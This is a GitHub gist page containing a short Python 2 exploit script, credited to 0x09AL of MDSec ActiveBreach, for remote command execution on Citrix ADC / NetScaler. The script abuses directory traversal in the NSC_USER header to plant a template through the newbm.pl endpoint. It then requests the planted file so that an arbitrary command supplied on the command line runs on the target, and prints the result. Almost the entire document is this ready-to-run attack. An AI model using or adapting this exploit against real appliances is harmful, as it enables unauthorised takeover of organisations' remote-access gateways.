Skip to content

Instantly share code, notes, and snippets.

@0x09AL
Created January 13, 2020 11:12
Show Gist options
  • Save 0x09AL/48c759855b2213a57acafe8c517bc788 to your computer and use it in GitHub Desktop.
Save 0x09AL/48c759855b2213a57acafe8c517bc788 to your computer and use it in GitHub Desktop.
Citrix ADC / NetScaler Remote Command Execution
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
template = "[% template.new('BLOCK'='print `{CMD}`') %]".replace("{CMD}",payload)
data = {'url': 'hello.com', 'title': 'ohno', 'desc': template, 'UI_inuse': 'RfWeb'}
headers = {'NSC_USER':'../../../../../../netscaler/portal/templates/HELLO'+append_value,'NSC_NONCE':'nsroot'}
r = requests.post(endpoint,data=data, headers=headers)
# print r.text
# print endpoint
def trigger(url):
trigger_url = url + "/vpns/portal/HELLO" + append_value + ".xml"
headers = {'NSC_USER':'nsroot','NSC_NONCE':'nsroot'}
r = requests.get(trigger_url, headers=headers)
print r.text
if(len(sys.argv)>2):
url = sys.argv[1]
command = sys.argv[2]
print "[+] Sending exploit to: "+ url + " [+]"
upload_file(url,command)
trigger(url)
else:
print "Not enough parameters passed."
print "python exploit.py URL COMMAND"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment